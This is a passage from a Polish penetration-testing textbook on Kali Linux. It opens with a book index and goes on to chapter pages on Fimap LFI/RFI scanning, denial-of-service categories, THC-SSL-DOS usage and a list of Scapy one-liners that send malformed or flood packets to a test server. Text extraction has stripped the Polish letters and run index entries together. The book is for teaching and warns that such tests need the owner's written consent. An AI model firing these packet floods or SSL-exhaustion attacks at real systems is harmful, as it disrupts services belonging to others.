kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 31: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

